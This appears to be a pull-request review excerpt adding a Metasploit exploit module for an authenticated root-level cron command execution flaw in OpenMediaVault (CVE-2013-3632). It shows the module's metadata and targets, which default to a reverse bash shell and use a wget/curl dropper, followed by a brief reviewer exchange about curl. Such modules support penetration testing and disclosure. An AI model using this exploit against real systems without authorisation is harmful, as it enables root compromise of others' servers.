modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,279 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenMediaVault rpc.php Authenticated Cron Remote Code Execution',
+        'Description' => %q{
+          OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
+          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
+          a cron entry that runs arbitrary commands as root on the system.
+          All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
+          'Mert BENADAM' # exploit author
+        ],
+        'References' => [
+          ['CVE', '2013-3632'],
+          ['PACKETSTORM', '178526'],
+          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
```

Comment:
```suggestion
              'CmdStagerFlavor' => ['wget'],
```

since apparently curl isn't installed :)

Reply:
Well, it is not installed on the appliances, however you can install the application also on an existing Debian distro that might have `curl` installed, so I would like to keep it in as an option.